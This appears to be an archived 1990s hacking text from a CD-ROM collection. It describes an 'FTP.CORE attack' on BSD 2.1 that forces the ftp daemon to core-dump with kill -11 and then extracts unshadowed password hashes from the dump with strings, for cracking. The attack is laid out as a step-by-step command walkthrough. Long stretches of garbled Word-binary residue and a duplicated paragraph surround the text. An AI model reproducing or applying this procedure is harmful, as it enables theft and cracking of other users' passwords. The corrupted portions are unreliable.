The Hacker's Encyclopedia 1998

home *** CD-ROM | disk | FTP | other *** search

/ The Hacker's Encyclopedia 1998 / hackers_encyclopedia.iso / hacking / unix / ftpcore.txt < prev next >

Wrap

Text File | 2003-06-11 | 9.0 KB | 29 lines

╨╧αí▒ ß>■ ■ ² ■ ■ ■ ■ Root Entry └F@pqwtσ║ÇWordDocument CompObj ^ ■ ∙ç£░╤τ°jkmno¥¼╩∩ 167[\∙≤φτß█╒╧╔─┐║╡░½ªí£ùÆìêâ≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡\`éº─Γπ / 0 4 5 \ ] v z ▒ ╦ ╓ ╫ i j ·⌡≡δµß▄╫╥═╚├╛╣┤»¬Ñá¢ûæîç≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡j ε ∩ ⁿ ² ■ ·⌡≡δµ≡≡≡≡≡∙■ ∙■ /K @± Normala "A@≥ í"Default Paragraph Font╨ @■ └FMicrosoft Word 6.0 Document MSWordDoc⌠9▓qo and should be able to pick it clean of all passwords and other information you might be interested in. This has only been tested, and worked on BSD 2.1 so far, if it works on other systems, feel free to modify this text to reflect it. Bronc Buster ▄Ñe#└ ∙■ ,l,l ¬O(∞ÿTεO MS Sans SerifSymbolTimes New RomanTimes New RomanFTP.CORE attack for BSD 2.1 ----------------------------------------------------------------------------------------------------------------- by The Bronc Buster bbuster@succeed.net http://www2.succeed.net/~bbuster Made for The Infected www.infected.com ----------------------------------------------------------------------------------------------------------------- This is a relativly simple attack, and can be done as ANY LEGIT user on a BSD 2.1 system. The focus of this attack is to get the ftp daemond to produce a core dump. When it dumps, all the information it has used up to the point it dumps will be stored in a file, in the the directory you are in, called "ftp.core". This file will contain shell and enviornment varibles, paths, and other misc stuff. What we will be looking for is the unshadowed passwd file. As this process has to access the passwd file to make sure you're legit, it stores all the information proir to your user in a buffer, and it will have to unshadow , or access the shadowed file, to do this. After you get the encrypted passwords, go find a copy of Cracker Jack and get to work. Ok, how to do it: #ftp foobar.com Welcom to foobar.com ftp site blah blah blah please enter login name> evil that user requires a password> evil2 User evil loged in welcome to foobar.com! Remote set to type BIN ftp> (now hit ^Z to suspend the process) #ps PID TT STAT TIME COMMAND 9526 p0 Ss 0:00.12 -csh (csh) 9539 p0 R+ 0:00.02 ps 1000 p0 Ss 0:00.22 ftp (get the PID number to the ftp process) #kill -11 1000 (kill the process) #fg (bring the ftp back to the foreground) Process Killed Core Dump #ls home mail public_html ftp.core #strings ftp.core > test #pico test From this point you have the .core in pico and should be able to pick it clean of all passwords and other information you might be interested in. This has only been tested, and worked on BSD 2.1 so far, if it works on other systems, feel free to modify this text to reflect it. Bronc Buster ∙åç¢£»░╨╤µτ≈°ijklmno~£¥½¼╔╩ε∩ 01567Z[\_`üéªº├─ßΓπ ²√∙≈⌡≤±∩φδΘτσπß▀▌█┘╫╒╙╤╧═╦╔╟┼├┴┐╜╗╣╖╡│▒»¡½⌐ºÑúíƒ¥¢ÖùòôæÅ]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]8 . / 0 3 4 5 [ \ ] u v y z ░ ▒ ╩ ╦ ╒ ╓ ╫ h i j φ ε ∩ √ ⁿ ² ■ ²√∙≈⌡≤±∩φδΘτσπß▀▌█┘╫╒╙╤╧═╦╔╟┼├┴┐]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]